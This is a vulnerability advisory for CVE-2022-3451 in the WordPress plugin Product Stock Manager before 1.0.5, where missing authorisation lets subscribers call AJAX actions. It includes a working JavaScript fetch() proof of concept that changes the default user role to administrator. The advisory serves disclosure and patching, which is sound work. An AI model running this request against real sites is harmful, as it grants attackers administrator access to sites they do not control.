Product Stock Manager < 1.0.5 – Subscriber+ Unauthorised AJAX Calls | CVE 2022-3451 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and proper CSRF checks in multiple AJAX actions, allowing users with a role as low as subscriber to call them. One action in particular could allow to update arbitrary options

Proof of Concept

To set the default role for new users to administrator, run the below command in the developer console of the web browser while being logged on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=af_sm_set_checkbox_status&name=default_role&checkbox_status=administrator',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

addify-product-stock-manager

Fixed in 1.0.5

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

d8005cd0-8232-4d43-a4e4-14728eaf1300

Timeline

Publicly Published

2022-10-17 (about 3 years ago)

Added

2022-10-17 (about 3 years ago)

Last Updated

2022-10-17 (about 3 years ago)

Other

Published

Title

Published

2024-02-14

Title

InstaWP Connect < 0.1.0.9 - Authenticated (Subscriber+) Remote Code Execution

Published

2023-06-08

Title

WP-Members Membership < 3.4.8 - Subscriber+ Unauthorized Plugin Settings Update

Published

2024-05-14

Title

WP Fundraising Donation and Crowdfunding Platform < 1.7.0 - Missing Authorization

Published

2024-08-16

Title

Atarim < 4.0.2 - Missing Authorization via remove_feedbacktool_notice()

Published

2025-06-05

Title

Slack Notifications by dorzki <= 2.0.7 - Missing Authorization